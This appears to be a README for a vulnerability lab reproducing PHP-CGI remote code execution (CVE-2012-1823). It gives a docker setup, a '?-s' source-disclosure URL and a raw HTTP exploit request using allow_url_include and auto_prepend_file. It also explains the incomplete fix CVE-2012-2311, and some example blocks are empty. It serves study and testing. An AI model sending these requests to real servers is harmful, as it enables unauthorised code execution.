# PHP-CGI Remote Code Execution (CVE-2012-1823)
[中文版本(Chinese version)](README.zh-cn.md)
PHP-CGI is a SAPI (Server Application Programming Interface) implementation that allows PHP to communicate with web servers. A vulnerability in PHP-CGI allows attackers to pass command-line arguments to PHP through query strings, potentially leading to remote code execution.
Affected versions: PHP < 5.3.12 or PHP < 5.4.2
References:
-
-
## Environment Setup
Execute the following command to start a web server that uses PHP-CGI 5.4.1:
```
docker compose up -d
```
After the server starts, visit `http://your-ip:8080/` to see the "Hello" message.
## Vulnerability Reproduction
Visit `http://your-ip:8080/index.php?-s` to reveal the source code, confirming the vulnerability exists. Send the following request to execute arbitrary PHP code:
```
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
```
## Technical Details
### PHP SAPI and Running Modes
PHP-CGI can run in two modes:
1. CGI mode: The web server creates a new process for each request
2. FastCGI mode: A persistent process handles multiple requests
According to RFC3875, when the query string doesn't contain an unencoded `=` character, it should be passed as CGI parameters. Apache implemented this requirement, but PHP didn't properly handle this case, leading to this vulnerability.
The simplest exploitation method is using the `-s` parameter to display source code:

A more powerful method is using `-d` to specify `auto_prepend_file`, creating an arbitrary file inclusion vulnerability:

Note: Replace spaces with `+` or `%20`, and encode `=` characters.
### CVE-2012-2311 - The Incomplete Fix
PHP initially fixed this vulnerability in versions 5.4.2 and 5.3.12 by checking for the `-` character at the start of the query string. However, this fix was incomplete and could be bypassed (CVE-2012-2311) when PHP-CGI was wrapped in a shell script:
```sh
#!/bin/sh
exec /usr/local/bin/php-cgi $*
```
By adding whitespace before the `-`, attackers could still pass parameters as the first character would be a space instead of `-`.
PHP addressed this in versions 5.4.3 and 5.3.13 by skipping all leading whitespace before checking for the `-` character.